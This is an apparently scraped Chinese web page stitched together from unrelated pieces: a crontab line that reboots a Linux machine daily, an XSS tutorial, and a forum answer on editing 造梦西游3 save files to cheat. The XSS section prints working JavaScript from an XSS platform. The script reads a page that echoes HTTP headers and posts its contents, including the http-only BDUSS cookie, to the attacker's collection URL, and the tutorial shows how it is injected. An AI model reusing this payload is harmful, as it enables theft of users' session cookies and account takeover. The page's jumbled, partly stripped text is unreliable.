关于linux系统中服务的部署和自动重启问题
用root用户登录系统 crontab -e #创建计划任务 按i进入输入模式,添加如下行 01 2 * * * reboot #该行表示每天2:01重启机器
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
谁会造梦西游3极品号源帮我弄
1、用IE打开造梦西游3创一个号新建一个角色。
2、进入九重天后马上退回来,点机文件—脱机工作—保存游戏。
3、打开我的电脑到C、E、D盘(反正所有盘)搜索#4399这个文件。
4、打开文件找到一个文件夹(4399帐号和刚刚的创建的帐号一样的)把里面的一个文件剪贴下来到桌面上再打开flashSolEditer修改器点击打开SOL文件找到刚刚剪贴下来的文件。
5、打开很长的字母的地方把原来的号源给删了把极品号源复制上去(如果是悟空就悟空,反正是那个人物就是那个人物的号源)点击保存SOL文件,再把在桌面的那文件在弄到4399帐号和刚刚的创建的帐号一样的文件里,在打开造梦3连刷新—连接就好了 。
造梦西游3极品号源怎么用就为您介绍到这里啦,呵呵!
求采纳
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
